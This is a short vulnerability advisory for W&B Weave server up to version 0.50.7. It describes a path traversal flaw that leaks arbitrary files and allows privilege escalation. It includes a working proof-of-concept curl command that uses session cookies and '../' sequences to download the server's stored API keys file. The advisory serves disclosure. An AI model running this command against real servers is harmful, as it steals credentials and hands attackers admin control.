W&B Weave server remote arbitrary file leak and privilege escalation
weave
(,0.50.7]
The Weave server API allows remote users to fetch files from a specific directory, but due to a lack of input validation, it is possible to traverse and leak arbitrary files remotely. In various common scenarios, this allows a low-privileged user to assume the role of the server admin.
export WANDB=<WANDB SESSION COOKIE>
export WANDB_SSO=<WANDB SSO SESSION COOKIE>
export SERVER_IP=<WANDB SERVER IP>
curl -s --path-as-is --cookie "wandb=$WANDB; wandb_sso=$WANDB_SSO" "http://$SERVER_IP:8080/__weave/file/vol/weave/cache/../../../vol/mysql/wandb_local/api_keys.ibd" --output apikeys.bin
No mitigations are supplied for this issue